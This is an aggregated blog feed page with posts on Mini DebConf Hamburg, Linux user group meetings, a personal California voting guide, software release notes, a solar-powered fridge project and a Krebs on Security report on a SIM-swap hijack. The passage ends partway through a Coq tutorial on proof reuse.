Planet Russell


Planet Debian - Joerg Jaspert: Mini DebConf Hamburg

Since Friday around noon, my 6-year-old son and I have been at the Mini DebConf in Hamburg. Attending together with my son is quite a different experience than coming alone or having my wife around as well. Though he is doing pretty well, it mostly means the day ends for me around 21:00, when he needs to go to sleep.

Friday

On Friday we had a nice train trip up here, with a change to the schedule that meant switching to local trains to actually get where we wanted. Still, we arrived in time for lunch, which is always good. Afterwards we first went to buy drinks for the coming days and discovered a nice playground just around the corner.

The evening, besides dinner, consisted of chatting, hacking and keeping Nils busy with something for the times he came to me. He easily found others around and is quick to socialise with people, so I had free hacking time.

Saturday

The day started with a bit of a hurry, as Nils suddenly got the offer to attend a concert in the Elbphilharmonie and I had to get him over there fast. He says he liked it, even though it didn’t make much sense. I met him later for lunch again, followed by a visit to the playground, and then finally hacking time again.

While Nils was off looking after other conference attendees (and apparently getting ice cream too), I could hack on stuff after attending the Salsa talk, and that meant dozens of merge requests for dak got processed (waldi and lamby are on a campaign against flake8 errors, it appears).

Apropos Salsa: the GitLab instance is the best thing that has happened to Debian in terms of collaboration for a long time. It allows much better handling of anything git-related; it's worlds apart from how things were before.

Holger showed Nils and me the venue, including climbing up one of the towers; quite an adventure for Nils, and a really nice view from up there.

In the evening the dak master branch was ready to get merged into our deploy branch - and as such automagically deployed on all machines where we run it. It consisted of 64 commits and, apparently, a bug, for which I thankfully found a merge request with a fix from waldi in the morning.

Sunday

I started the morning, after breakfast, by merging the fixup for the bug and getting it into the deploy branch. I also asked DSA to adjust group rights for the ftpteam; today we got one promotion from ftptrainee to ftpteam, so everybody please offer your condolences to waldi. I also added more ftptrainees, as we got more volunteers, and removed inactive ones.

Soon we have to start our way back home, but I will surely come back for another Mini DebConf if it happens here again.

Planet Linux Australia - Linux Users of Victoria (LUV) Announce: LUV June 2018 Workshop: Being an Acrobat: Linux and PDFs

Jun 16 2018, 12:30 to 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Portable Document Format (PDF) is a file format first specified by Adobe Systems in 1993. It was a proprietary format until it was released as an open standard on July 1, 2008, and published by the International Organization for Standardization.

This workshop presentation will demonstrate various ways that PDF files can be efficiently manipulated in Linux and with other free software, including ways that may not be easy in proprietary operating systems or applications.
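
For a concrete flavour, a few common command-line tools already cover typical PDF tasks; these are illustrative examples only, not necessarily the exact tools covered in the workshop:

pdfunite part1.pdf part2.pdf combined.pdf         # merge documents (poppler-utils)
pdftk report.pdf cat 1-10 output excerpt.pdf      # extract pages 1-10 (pdftk)
pdftotext paper.pdf paper.txt                     # extract the plain text (poppler-utils)
gs -sDEVICE=pdfwrite -dPDFSETTINGS=/ebook -o small.pdf large.pdf  # recompress (ghostscript)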

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121.  Late arrivals please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria is a subcommittee of Linux Australia.


Planet Linux Australia - Linux Users of Victoria (LUV) Announce: LUV June 2018 Main Meeting: VoxxedDays conference report

Jun 5 2018, 18:30 to 20:30
Location: 
Kathleen Syme Library, 251 Faraday Street Carlton VIC 3053

PLEASE NOTE NEW LOCATION

6:30 PM to 8:30 PM Tuesday, June 5, 2018
Meeting Room 3, Kathleen Syme Library, 251 Faraday Street Carlton VIC 3053

Speakers:

  • Andrew Pam, Voxxed Days conference report

Andrew will report on a conference he recently attended, covering Language-Level Virtualization with GraalVM, Aggressive Web Apps and more.

Many of us like to go for dinner nearby after the meeting, typically at Trotters Bistro in Lygon St.  Please let us know if you'd like to join us!

Linux Users of Victoria is a subcommittee of Linux Australia.


Planet Debian - Ben Hutchings: Help the Debian kernel team to help you

I gave the first talk this morning at Mini-DebConf Hamburg, titled "Help the kernel team to help you". I briefly described several ways that Debian users and developers can make it easier (or harder) for us to deal with their requests. The slides are up on my talks page, and video should be available soon.

Planet Debian - Russ Allbery: California state election

Hm, I haven't done one of these in a while. Well, time to alienate future employers and make awkward mistakes in public that I have to explain if I ever run for office! (Spoiler: I'm highly unlikely to ever run for office.)

This is only of direct interest to California residents. To everyone else, RIP your feed reader, and I'm sorry for the length. (My hand-rolled blog software doesn't do cut tags.) I'll spare you all the drill-down into the Bay Area regional offices. (Apparently we elect our coroner, which makes no sense to me.)

Propositions

I'm not explaining these because this is already much too long; those who aren't in California and want to follow along can see the voter guide.

Proposition 68: YES. Still a good time to borrow money, and what we're borrowing money for here seems pretty reasonable. State finances are in reasonable shape; we have the largest debt of any state for the obvious reason that we have the most people and the most money.

Proposition 69: YES. My instinct is to vote no because I have a general objection to putting restrictions on how the state manages its budget. I don't like dividing tax money into locked pools for the same reason that I stopped partitioning hard drives. That said, this includes public transit in the spending pool from gasoline taxes (good), the opposition is incoherent, and there are wide-ranging endorsements. That pushed me to yes on the grounds that maybe all these people understand something about budget allocations that I don't.

Proposition 70: NO. This is some sort of compromise with Republicans because they don't like what cap-and-trade money is being spent on (like high-speed rail) and want a say. If I wanted them to have a say, I'd vote for them. There's a reason why they have to resort to backroom tricks to try to get leverage over laws in this state, and it's not because they have good ideas.

Proposition 71: YES. Entirely reasonable change to say that propositions only go into effect after the election results are final. (There was a real proposition where this almost caused a ton of confusion, and prompted this amendment.)

Proposition 72: YES. I'm grumbling about this because I think we should get rid of all this special-case bullshit in property taxes and just readjust them regularly. Unfortunately, in our current property tax regime, you have to add more exemptions like this because otherwise the property tax hit (that would otherwise not be incurred) is so large that it kills the market for these improvements. Rainwater capture is to the public benefit in multiple ways, so I'll hold my nose and vote for another special exception.

Federal Offices

US Senator: Kevin de León. I'll vote for Feinstein in the general, and she's way up on de León in the polls, but there's no risk in voting for the more progressive candidate here since there's no chance Feinstein won't get the most votes in the primary. De León is a more solidly progressive candidate than Feinstein. I'd love to see a general election between the two of them.

State Offices

I'm omitting all the unopposed ones, and all the ones where there's only one Democrat running in the primary. (I'm not going to vote for any Republican except for one exception noted below, and third parties in the US are unbelievably dysfunctional and not ready to govern.) For those outside the state, California has a jungle primary where the top two vote-getters regardless of party go to the general election, so this is more partisan and more important than other state primaries.

Governor: Delaine Eastin. One always has to ask, in our bullshit voting system, whether one has to vote tactically instead of for the best candidate. But, looking at polling, I think there's no chance Gavin Newsom (the second-best candidate and the front-runner) won't advance to the general election, so I get to vote for the candidate I actually want to win, even though she's probably not going to. Eastin is by far the most progressive candidate running who actually has the experience required to be governor. (Spoiler: Newsom is going to win, and I'll definitely vote for him in the general against Villaraigosa.)

Lieutenant Governor: Eleni Kounalakis. She and Bleich are the strongest candidates. I don't see a ton of separation between them, but Kounalakis's endorsements are a bit stronger for me. She's also the one candidate who has a specific statement about what she plans to do with the lieutenant governor's role of oversight over the university system, which is almost its only actual power. (This political office is stupid and we should abolish it.)

Secretary of State: Alex Padilla. I agree more with Ruben Major's platform (100% paper ballots is the correct security position), but he's an oddball outsider and I don't think he can accomplish as much. Padilla has an excellent track record as the incumbent and is doing basically the right things, just less dramatically.

Treasurer: Fiona Ma. I like Vivek Viswanathan and support his platform, but Fiona Ma has a lot more political expertise and I think will be more effective. I look forward to voting for Viswanathan for something else someday.

Attorney General: Dave Jones. Xavier Becerra hasn't been doing a bad job fighting off bad federal policy, but that seems to be all that he's interested in, and he's playing partisan games with the office. He has an air of amateurishness and political hackery. Dave Jones holds the same positions in a more effective way, is more professional, and has done a good job as Insurance Commissioner.

Insurance Commissioner: Steve Poizner. I'm going to vote for the (former) Republican here. Poizner expressed some really bullshit views on immigration when he ran for governor (which he's apologized for). I wouldn't support him for a more political office. But he was an excellent insurance commissioner (see, for instance, the response to Blue Cross's rate increase request). I'm closer to Ricardo Lara politically, but in his statements to the press he comes across as a clown: self-driving car insurance problems, cannabis insurance, climate change insurance, and a bunch of other nonsense that makes me think he doesn't understand the job. The other democrat, Mahmood, seems like less of a partisan hack, but he's a virtual unknown. If this were an important partisan office, I'd hold my nose and vote for Lara, but the job of insurance commissioner is more to be an auditor and negotiator, and Poizner was really good at it.

Superintendent of Public Instruction: Tony Thurmond. The other front-runner is Marshall Tuck, who is a charter school advocate. I hate charter schools with the passion of a burning sun.

Local Measures

Regional Measure 3: YES. Even more hyper-local than the rest of this post, but mentioning it because it was a narrow call. Bridge tolls are regressive, and I'm not a big fan of raising them as opposed to, say, increasing property taxes (yes please) or income taxes. That said, taxing cars to pay for (largely) public transit is the direction the money should flow. It was thinly balanced for me, but the thrust of the projects won out over the distaste at the regressive tax.


Planet Debian - Russ Allbery: Free software log (April 2018)

This is rather late since I got distracted by various other things including, ironically, releasing a bunch of software. This is for April, so it doesn't include the releases from this month.

The main release I worked on was remctl 3.14, which fixed a security bug introduced in 3.12 with the sudo configuration option. This has since been replaced by 3.15, which has more thorough maintainer testing infrastructure to hopefully prevent this from happening again.

I also did the final steps of the release process for INN 2.6.2, although as usual Julien ÉLIE did all of the hard work.

On the Debian side, I uploaded a new rssh package for the migration to GitLab (salsa.debian.org). I have more work to do on that front, but haven't yet had the time. I've been prioritizing some of my own packages over doing more general Debian work.

Finally, I looked at my Perl modules on CPANTS (the CPAN testing service) and made note of a few things I need to fix, plus filed a couple of bugs for display issues (one of which turned out to be my fault and fixed in Git). I also did a bit of research on the badges that people in the Rust community use in their documentation and started adding support to DocKnot, some of which made it into the subsequent release I did this month.

Planet Debian - Dirk Eddelbuettel: RcppGSL 0.3.5

A maintenance update of RcppGSL just brought version 0.3.5 to CRAN, a mere twelve days after the RcppGSL 0.3.4 release. Just like yesterday's upload of inline 0.3.15, it was prompted by a CRAN request to update the per-package manual page; see the inline post for details.

The RcppGSL package provides an interface from R to the GNU GSL using the Rcpp package.

No user-facing new code or features were added. The NEWS file entries follow below:

Changes in version 0.3.5 (2018-05-19)

  • Update package manual page using references to DESCRIPTION file [CRAN request].

Courtesy of CRANberries, a summary of changes to the most recent release is available.

More information is on the RcppGSL page. Questions, comments etc should go to the issue tickets at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet Debian - Martín Ferrari: MiniDebConf Hamburg - Friday/Saturday

MiniDebCamp Hamburg - Friday 18/5, Saturday 19/5

Friday and Saturday have been very productive days, I love events where there is time to hack!

I had more chats about contributors.d.o with Ganneff and Formorer, and if all goes according to plan, soon salsa will start streaming commit information to contributors and populate information about different teams: not only about normal packaging repos, but also about websites, tools, native packages, etc.

Note that the latter require special configuration, and the same goes if you want to have separate stats for your team (like for the Go team or the Perl team). So if you want to offer proper attribution to members of your team, please get in touch!


I spent loads of time working on Prometheus packages, and finally today (after almost a year) I uploaded a new version of prometheus-alertmanager to experimental. I decided to just drop the web interface entirely, as packaging the whole Elm framework would take me months of work. If anybody feels like writing a basic HTML/JS interface, I would be happy to include it in the package!

While doing that, I found bugs in the CI pipeline for Go packages in Salsa. Solving these will hopefully make the automatic testing more reliable, as API breakage is sadly a big problem in the Go ecosystem.


I am loving the venue here. Apart from hosting some companies and associations, there is an art gallery which currently has a photo exhibition called Echo park; there were parties happening last night, and tonight apparently there will be more. This place is amazing!


Planet Debian - Thorsten Glaser: Progress report from the Movim packaging sprint at MiniDebconf

Nik wishes you to know that the Movim packaging sprint (sponsored by the DPL, thank you!) is handled under the umbrella of the Debian Edu sprint (similarly sponsored), since this package is handled by the Teckids Debian Task Force, personnel from Teckids e.V.

After arriving, I’ve started collecting knowledge first. I reviewed upstream’s composer.json file and Wiki page about dependencies and, after it quickly became apparent that we need much more information (e.g. which versions are in sid, what the package names are, and, most importantly, recursive dependencies), a Wiki page of our own grew. Then I made a hunt for information about how to package stuff that uses PHP Composer upstream, and found the, ahem, wonderfully abundant, structured, plentiful and clear documentation from the Debian PHP/PEAR Packaging team. (Some time and reverse-engineering later I figured out that we just ignore composer and read its control file in pkg-php-tools converting dependency information to Debian package relationships. Much time later I also figured out it mangles package names in a specific way and had to rename one of the packages I created in the meantime… thankfully before having uploaded it.) Quickly, the Wiki page grew listing the package names we’re supposed to use. I created a package which I could use as template for all others later.

The upstream Movim developer arrived as well — we have quite an amount of upstream developers of various projects attending MiniDebConf, to the joy of the attendees actually directly involved in Debian, and this makes things much easier, as he immediately started removing dependencies (to make our job easier) and fixing bugs and helping us understand how some of those dependencies work. (I also contributed code upstream that replaces some Unicode codepoints or sequences thereof, such as 3⃣ or ‼ or 👱🏻‍♀️, with <img…/> tags pointing to the SVG images shipped with Movim, with a description (generated from their Unicode names) in the alt attribute.)

Now, Saturday, all dependencies are packaged so far, although we’re still waiting for maintainer feedback for those two we’d need to NMU (or have them upload or us take the packages over); most are in NEW of course, but that’s no problem. Now we can tackle packaging Movim itself — I guess we’ll see whether those other packages actually work then ☺

We also had a chance to fix bugs in other packages, like guacamole-client and musescore.

In the meantime we’ve also had the chance to socialise, discuss, meet, etc. other Debian Developers and associates and enjoy the wonderful food and superb coffee of the “Cantina” at the venue; let me hereby express heartfelt thanks to the MiniDebConf organisation for this good location pick!

Update, later this night: we took over the remaining two packages with permission from their previous team and uploader, and have already started with actually packaging Movim, discovering untold gruesome things in the upstream of the two webfonts it bundles.

Planet Debian - Mike Hommey: Announcing git-cinnabar 0.5.0 beta 3

Git-cinnabar is a git remote helper to interact with Mercurial repositories. It allows you to clone, pull and push from/to Mercurial remote repositories, using git.

Get it on github.
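
As a quick usage sketch (assuming git-cinnabar is installed and on your PATH; the URL is just an example repository):

# Clone a Mercurial repository through the hg:: remote helper
git clone hg::https://www.mercurial-scm.org/repo/hg
# Afterwards, git pull and git push talk to the Mercurial remote like any other git remote.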

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.0 beta 2?

  • Fixed incompatibilities with Mercurial >= 4.4.
  • Miscellaneous metadata format changes.
  • Move more operations to the helper, hopefully making things faster.
  • Updated git to 2.17.0 for the helper.
  • Properly handle clones with bundles when the repository doesn’t contain anything newer than the bundle.
  • Fixed tag cache, which could lead to missing tags.

Planet Debian - Dirk Eddelbuettel: inline 0.3.15

A maintenance release of the inline package arrived on CRAN today. inline facilitates writing code in-line in simple string expressions or short files. The package is mature and in maintenance mode: Rcpp used it heavily for several years but then moved on to Rcpp Attributes, so we have a much more limited need for extensions to inline. But a number of other packages have a hard dependency on it, so we do of course look after it as part of the open source social contract (which is a name I just made up, but you get the idea...)

This release was triggered by an (as usual very reasonable) CRAN request to update the per-package manual page, which had become stale. We now use Rd macros; you can see the diff for just that file at GitHub, and I also include it below. My pkgKitten package-creation helper uses the same scheme, and I wholeheartedly recommend it -- as the diff shows, it makes things a lot simpler.

Some other changes reflect two user-contributed pull requests, as well as standard minor package update issues. See below for a detailed list of changes extracted from the NEWS file.

Changes in inline version 0.3.15 (2018-05-18)

  • Correct requireNamespace() call (thanks to Alexander Grueneberg in #5).

  • Small simplification to .travis.yml; also switch to https.

  • Use seq_along instead of seq(along=...) (Watal M. Iwasaki in #6).

  • Update package manual page using references to DESCRIPTION file [CRAN request].

  • Minor packaging updates.

Courtesy of CRANberries, there is a comparison to the previous release.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.


Planet Debian - Joey Hess: fridge 0.1

Imagine something really cool, like a fridge connected to a powerwall, powered entirely by solar panels. What could be cooler than that?

How about a fridge powered entirely by solar panels without the powerwall? Zero battery use, and yet it still preserves your food.

That's much cooler, because batteries, even hyped ones like the powerwall, are expensive and inefficient and have limited cycles. Solar panels are cheap and efficient now. With enough solar panels that the fridge has power to cool down most days (even cloudy days), and a smart enough control system, the fridge itself becomes the battery -- a cold battery.

I'm live coding my fridge, with that goal in mind. You can follow along in this design thread on secure scuttlebutt, and my git commits, and you can watch real-time data from my fridge.

Over the past two days, which were not especially sunny, my 1 kilowatt of solar panels has managed to cool the fridge down close to standard fridge temperatures. The temperature remains steady overnight thanks to added thermal mass in the fridge. My food seems safe in it, despite it being powered off for 14 hours each night.

graph of fridge temperature, starting at 13C and trending downwards to 5C over 24 hours

(Numbers in this graph are running higher than the actual temps of food in the fridge, for reasons explained in the scuttlebutt thread.)

Of course, the long-term viability of a fridge that never draws from a battery is TBD; I'll know within a year if it works for me.

bunch of bananas resting on top of chest freezer fridge conversion

I've written about the coding side of this project before, in my haskell controlled offgrid fridge. The reactive-banana-automation library is working well in this application. My AIMS inverter control board and easy-peasy-devicetree-squeezy were other groundwork for this project.

Cryptogram - Friday Squid Blogging: Flying Squid

Flying squid are real.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Planet Debian - Andrej Shadura: Goodbye Octopress, hello Pelican

Hi from MiniDebConf in Hamburg!

As you may have noticed, I don’t update this blog often. One of the reasons was that until now it was incredibly difficult to write posts. The software I used, Octopress (based on Jekyll), was written in Ruby, and it required quite specific versions of its dependencies. I had the workspace deployed on one of my old laptops, but when I attempted to reproduce it on the laptop I currently use, I failed. Some dependencies could not be installed, others failed, and my Ruby skills weren’t enough to fix that mess. (I have to admit my Ruby skills have improved insignificantly since the time I installed Octopress, but that wasn’t enough to help in this case.)

I’ve spent some time during this DebCamp migrating to Pelican, which is written in Python, packaged in Debian, and whose dependencies are quite straightforward to install. I had to install (and write) a few plugins to make the migration easier, and port my custom Octopress Bootstrap theme to Pelican.
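
For reference, getting started with Pelican on Debian is roughly this simple (a minimal sketch of a fresh setup, not the exact steps of this migration):

# install Pelican from the Debian archive
sudo apt install pelican
# create a site skeleton by answering a few questions
pelican-quickstart
# build the static site from the content/ directory
pelican content -o output -s pelicanconf.py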

I no longer include any scripts from Twitter or Facebook (I made Tweet and Share button static links), and the Disqus comments are loaded only on demand, so reading this blog will respect your privacy better than before.

See you at MiniDebConf tomorrow!

Krebs on Security - T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account

T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.

Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked. Rosenzweig had previously adopted T-Mobile’s advice to customers about blocking mobile number port-out scams, an increasingly common scheme in which identity thieves armed with a fake ID in the name of a targeted customer show up at a retail store run by a different wireless provider and ask that the number be transferred to the competing mobile company’s network.

So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or an automated call that reads the one-time code aloud.

In this case, however, the perpetrator didn’t try to port Rosenzweig’s phone number: Instead, the attacker called multiple T-Mobile retail stores within an hour’s drive of Rosenzweig’s home address until he succeeded in convincing a store employee to conduct what’s known as a “SIM swap.”

A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.

However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.

Rosenzweig said the first inkling he had that something wasn’t right with his phone was on the evening of May 2, 2018, when he spotted an automated email from Instagram. The message said the email address tied to the three-letter account he’d had on the social media platform for seven years — instagram.com/par — had been changed. He quickly logged in to his Instagram account, changed his password and then reverted the email on the account back to his original address.

By this time, the SIM swap conducted by the attacker had already been carried out, although Rosenzweig said he didn’t notice his phone displaying zero bars and no connection to T-Mobile at the time because he was at home and happily surfing the Web on his device using his own wireless network.

The following morning, Rosenzweig received another notice — this one from Snapchat — stating that the password for his account there (“p9r”) had been changed. He subsequently reset the Instagram password and then enabled two factor authentication on his Snapchat account.

“That was when I realized my phone had no bars,” he recalled. “My phone was dead. I couldn’t even call 611,” [the mobile short number that all major wireless providers make available to reach their customer service departments].

It appears that the perpetrator of the SIM swap abused not only internal knowledge of T-Mobile’s systems, but also a lax password reset process at Instagram. The social network allows users to enable notifications on their mobile phone when password resets or other changes are requested on the account.

But this isn’t exactly two-factor authentication because it also lets users reset their passwords via their mobile account by requesting a password reset link to be sent to their mobile device. Thus, if someone is in control of your mobile phone account, they can reset your Instagram password (and probably a bunch of other types of accounts).

Rosenzweig said even though he was able to reset his Instagram password and restore his old email address tied to the account, the damage was already done: All of his images and other content he’d shared on Instagram over the years was still tied to his account, but the attacker had succeeded in stealing his “par” username, leaving him with a slightly less sexy “par54384321,” (apparently chosen for him at random by either Instagram or the attacker).

As I wrote in November 2015, short usernames are something of a prestige or status symbol for many youngsters, and some are willing to pay surprising sums of money for them. Known as “OG” (short for “original” and also “original gangster”) in certain circles online, these can be usernames for virtually any service, from email accounts at Webmail providers to social media services like Instagram, Snapchat, Twitter and YouTube.

People who traffic in OG accounts prize them because they can make the account holder appear to have been a savvy, early adopter of the service before it became popular and before all of the short usernames were taken.

Rosenzweig said a friend helped him work with T-Mobile to regain control over his account and deactivate the rogue SIM card. He said he’s grateful the attackers who hijacked his phone for a few hours didn’t try to drain bank accounts that also rely on his mobile device for authentication.

“It definitely could have been a lot worse given the access they had,” he said.

But throughout all of this ordeal, it struck Rosenzweig as odd that he never once received an email from T-Mobile stating that his SIM card had been swapped.

“I’m a software engineer and I thought I had pretty good security habits to begin with,” he said. “I never re-use passwords, and it’s hard to see what I could have done differently here. The flaw here was with T-Mobile mostly, but also with Instagram. It seems like by having the ability to change one’s [Instagram] password by email or by mobile alone negates the second factor and it becomes either/or from the attackers point of view.”

Sources close to the investigation say T-Mobile is investigating a current or former employee as the likely culprit. The mobile company also acknowledged that it does not currently send customers an email to the email address on file when SIM swaps take place. A T-Mobile spokesperson said the company was considering changing the current policy, which sends the customer a text message to alert them about the SIM swap.

“We take our customers privacy and security very seriously and we regret that this happened,” the company said in a written statement. “We notify our customers immediately when SIM changes occur, but currently we do not send those notifications via email. We are actively looking at ways to improve our processes in this area.”

In summary, when a SIM swap happens on a T-Mobile account, T-Mobile will send a text message to the phone equipped with the new SIM card. But obviously that does not help someone who is the target of a SIM swap scam.

As we can see, just taking T-Mobile’s advice to place a personal identification number (PIN) on your account to block number port out scams does nothing to flag one’s account to make it harder to conduct SIM swap scams.

Rather, T-Mobile says customers need to call in to the company’s customer support line and place a separate “SIM lock” on their account, which can only be removed if the customer shows up at a retail store with ID (or, presumably, anyone with a fake ID who also knows the target’s Social Security Number and date of birth).

I checked with the other carriers to see if they support locking the customer’s current SIM to the account on file. I suspect they do, and will update this piece when/if I hear back from them. In the meantime, it might be best just to phone up your carrier and ask.

Please note that a SIM lock on your mobile account is separate from a SIM PIN that you can set via your mobile phone’s operating system. A SIM PIN is essentially an additional layer of physical security that locks the current SIM to your device, requiring you to input a special PIN when the device is powered on in order to call, text or access your data plan on your phone. This feature can help block thieves from using your phone or accessing your data if you lose your phone, but it won’t stop thieves from physically swapping in their own SIM card.

iPhone users can follow these instructions to set or change a device’s SIM PIN. Android users can see this page. You may need to enter a carrier-specific default PIN before being able to change it. By default, the SIM PIN for all Verizon and AT&T phones is “1111;” for T-Mobile and Sprint it should default to “1234.”

Be advised, however, that if you forget your SIM PIN and enter the wrong PIN too many times, you may end up having to contact your wireless carrier to obtain a special “personal unlocking key” (PUK).

At the very least, if you haven’t already done so please take a moment to place a port block PIN on your account. This story explains exactly how to do that.

Also, consider reviewing twofactorauth.org to see whether you are taking full advantage of any multi-factor authentication offerings so that your various accounts can’t be trivially hijacked if an attacker happens to guess, steal, phish or otherwise know your password.

One-time login codes produced by mobile apps such as Authy, Duo or Google Authenticator are more secure than one-time codes sent via automated phone call or text — mainly because crooks can’t steal these codes if they succeed in porting your mobile number to another service or by executing a SIM swap on your mobile account [full disclosure: Duo is an advertiser on this blog].

Update, May 19, 3:16 pm ET: Rosenzweig reports that he has now regained control over his original Instagram account name, “par.” Good on Instagram for fixing this, but it’s not clear the company has a real strong reporting process for people who find their usernames are hijacked.

Planet Debian - Joachim Breitner: Proof reuse in Coq using existential variables

This is another technical post that is of interest only to Coq users.

TL;DR: Using existential variables for hypotheses allows you to easily refactor a complicated proof into an induction schema and the actual proofs.

Setup

As a running example, I will use a small theory of “bags”, which you can think of as lists represented as trees, to allow an O(1) append operation:

Require Import Coq.Arith.Arith.
Require Import Psatz.
Require FunInd.

(* The data type *)
Inductive Bag a : Type :=
  | Empty : Bag a
  | Unit  : a -> Bag a
  | Two   : Bag a -> Bag a -> Bag a.

Arguments Empty {_}.
Arguments Unit {_}.
Arguments Two {_}.

Fixpoint length {a} (b : Bag a) : nat :=
  match b with
  | Empty     => 0
  | Unit _    => 1
  | Two b1 b2 => length b1 + length b2
  end.

(* A smart constructor that ensures that a [Two] never
   has [Empty] as subtrees. *)
Definition two {a} (b1 b2 : Bag a) : Bag a := match b1 with
  | Empty => b2
  | _ => match b2 with | Empty => b1
                       | _ => Two b1 b2 end end.

Lemma length_two {a} (b1 b2 : Bag a) :
  length (two b1 b2) = length b1 + length b2.
Proof. destruct b1, b2; simpl; lia. Qed.

(* A first non-trivial function *)
Function take {a : Type} (n : nat) (b : Bag a) : Bag a :=
  if n =? 0
  then Empty
  else match b with
       | Empty     => b
       | Unit x    => b
       | Two b1 b2 => two (take n b1) (take (n - length b1) b2)
       end.

The theorem

The theorem that I will be looking at in this post describes how length and take interact:

Theorem length_take''':
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).

Before I dive into it, let me point out that this example itself is too simple to warrant the techniques that I will present in this post. I have to rely on your imagination to scale this up to appreciate the effect on significantly bigger proofs.

Naive induction

How would we go about proving this lemma? Surely, induction is the way to go! And indeed, this is provable using induction (on the Bag) just fine:

Proof.
  intros.
  revert n.
  induction b; intros n.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + rewrite Nat.min_0_r. reflexivity.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + simpl. lia.
  * simpl.
    destruct (Nat.eqb_spec n 0).
    + subst. rewrite Nat.min_0_l. reflexivity.
    + simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

But there is a problem: A proof by induction on the Bag argument immediately creates three subgoals, one for each constructor. But that is not how take is defined, which first checks the value of n, independent of the constructor. This means that we have to do the case-split and the proof for the case n = 0 three times, although they are identical. It’s a one-line proof here, but imagine something bigger...

Proof by fixpoint

Can we refactor the proof to handle the case n = 0 first? Yes, but not with a simple invocation of the induction tactic. We could do well-founded induction on the length of the argument, or we could do the proof using the more primitive fix tactic. The latter is a bit hairy: you won’t know if your proof is accepted until you do Qed (or check with Guarded), but when it works it can yield some nice proofs.

Proof.
  intros a.
  fix IH 2.
  intros.
  rewrite take_equation.
  destruct (Nat.eqb_spec n 0).
  + subst n. rewrite Nat.min_0_l. reflexivity.
  + destruct b.
    * rewrite Nat.min_0_r. reflexivity.
    * simpl. lia.
    * simpl. rewrite length_two, !IH. lia.
Qed.

Nice: we eliminated the duplication of proofs!

A functional induction lemma

Again, imagine that we jumped through more hoops here ... maybe some well-founded recursion with a tricky size measure and complex proofs that the measure decreases ... or maybe you need to carry around an invariant about your arguments and you have to work hard to satisfy the assumption of the induction hypothesis.

As long as you do only one proof about take, that is fine. As soon as you do a second proof, you will notice that you have to repeat all of that, and it can easily make up most of your proof...

Wouldn’t it be nice if you could do the common parts of the proofs only once, obtain a generic proof scheme that you can use for (most) proofs about take, and then just fill in the blanks?

Incidentally, the Function command provides precisely that:

take_ind
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       (forall (n : nat) (b : Bag a), (n =? 0) = true -> P n b Empty) ->
       (forall (n : nat) (b : Bag a), (n =? 0) = false -> b = Empty -> P n Empty b) ->
       (forall (n : nat) (b : Bag a), (n =? 0) = false -> forall x : a, b = Unit x -> P n (Unit x) b) ->
       (forall (n : nat) (b : Bag a),
        (n =? 0) = false ->
        forall b1 b2 : Bag a,
        b = Two b1 b2 ->
        P n b1 (take n b1) ->
        P (n - length b1) b2 (take (n - length b1) b2) ->
        P n (Two b1 b2) (two (take n b1) (take (n - length b1) b2))) ->
       forall (n : nat) (b : Bag a), P n b (take n b)

which is great if you can use Function (although not perfect – we’d rather see n = 0 instead of (n =? 0) = true), but often Function is not powerful enough to define the function you care about.

Extracting the scheme from a proof

We could define our own take_ind' by hand, but that is a lot of work, we may not get it right easily, and when we change our functions, there is now this big proof statement to update.

Instead, let us use existentials, which are variables where Coq infers their type from how we use them, so we don’t have to declare them. Unfortunately, Coq does not support writing just

Lemma take_ind':
  forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
  forall (IH1 : ?) (IH2 : ?) (IH3 : ?) (IH4 : ?),
  forall n b, P n b (take n b).

where we just leave out the type of the assumptions (Isabelle does allow this...), but we can fake it using some generic technique.

We begin by stating an auxiliary lemma using a sigma type to say “there exist some assumptions that are sufficient to show the conclusion”:

Lemma take_ind_aux:
  forall a (P : _ -> _ -> _ -> Prop),
  { Hs : Prop |
    Hs -> forall n (b : Bag a), P n b (take n b)
  }.

We use the eexists tactic (existential exists, see https://coq.inria.fr/refman/proof-engine/tactics.html#coq:tacv.eexists) to construct the sigma type without committing to the type of Hs yet.

Proof.
  intros a P.
  eexists.
  intros Hs.

This gives us an assumption Hs : ?Hs – note the existential type. We need four of those, which we can achieve by writing

  pose proof Hs as H1. eapply proj1 in H1. eapply proj2 in Hs.
  pose proof Hs as H2. eapply proj1 in H2. eapply proj2 in Hs.
